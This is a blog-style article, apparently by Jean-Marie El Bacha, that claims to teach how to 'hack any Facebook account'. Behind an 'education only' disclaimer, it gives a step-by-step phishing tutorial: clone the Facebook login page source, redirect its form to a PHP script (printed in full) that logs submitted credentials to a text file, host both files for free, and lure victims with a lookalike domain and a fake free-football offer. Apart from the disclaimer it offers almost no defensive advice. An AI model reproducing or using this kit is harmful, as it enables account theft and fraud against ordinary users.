A Simple Technique to Hack Any Facebook Account

JEAN-MARIE EL BACHA – TRIPLE E GROUP

A simple technique to hack any Facebook Account!!
Before reading this article, READ CAREFULLY THE FOLLOWING:

Don’t try this in the real world!!! Only try it in a private environment on your own web server! The goal of this article is not learning how to steal, but it’s to learn how the hackers steal accounts and how to prevent being attacked by this kind of attacks.

If you want to protect your Facebook account you should know which techniques the hacker use to steal and lock you out of it! The goal of this article is not listing all the techniques. Our aim, is to tell you about a technique that’s hitting approximately again every Facebook user. YOU SHOULD NOT USE THIS TECHNIQUE IN THE REAL WORLD! THIS ARTICLE IS ONLY FOR EDUCATION PURPORSES!

Phishing:

This is the most common method to steal Facebook accounts around the world! In few easy steps, it can trick some users into giving their sensitive information without the need to hack them. Let’s say Joe wants to get the credential of Albert and he knows that his friend love sports, so what he’ll do is trick Albert into clicking on a link, fool him that he’s on Facebook and push him into giving his username and password.

So, all that Joe should do is creating a “Phishing” site, which is the same site of Facebook, same appearance, and then sends it to Albert and tell him: “Man, I found a site that streams live football games online for free”. The link we’ll probably look something similar like this www.facebouk.com/WatchSport.

Now Albert is excited about the games, he doesn’t read carefully the link, he clicks, he’s at a site that asks him to sign in through Facebook to be able to watch the games, next thing, his fooled and his account is compromised.

This is how to create a Facebook Phishing Page:

1. Go to the login page of Facebook. Right click on the page and click on “View Source Page”. You’re now viewing the code behind the page. Copy this code to a notepad file.

2. Find the word “action” in the file (You can use Ctrl + F). You’ll see a line that looks like this: action=“https://www.facebook.com/login.php?login_attempt=1″.

3. Now delete everything between these two quotations and write “post.php”. Now the line should look like: action=”post.php”

4. Save the notepad as “index.htm” – This will become your phishing page.

5. Now you should create the “post.php” file, the one that will let you get the data entered by the victim: Copy and paste the following code:

<?php
header (‘Location:http://www.facebook.com/’);
$handle = fopen(“usernames.txt”, “a”);
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, “=”);
fwrite($handle, $value);
fwrite($handle, “rn”);
}
fwrite($handle, “rn”);
fclose($handle);
exit;
?>
6. Now you have two files, “post.php” and “index.htm”

7. Now you have to post this code with free hosting providers. You can use https://www.000webhost.com/

8. Sign up for an account, browse to “Control Panel”, go to “File Manager”, click on “publick_html”. Delete the file “default.php” and upload the two file you’ve already created “index.htm” and “post.php”

9. If you click on preview for “ondex.htm” you can see that it looks very similar to Facebook login page. The link of this page is what you should work on, embedded it in websites, forums, popup ads or emails.

10. When your victim is fooled, you should find in “File Manager” a file named “username.txt”. Open this file and you should see the login credentials of your victim.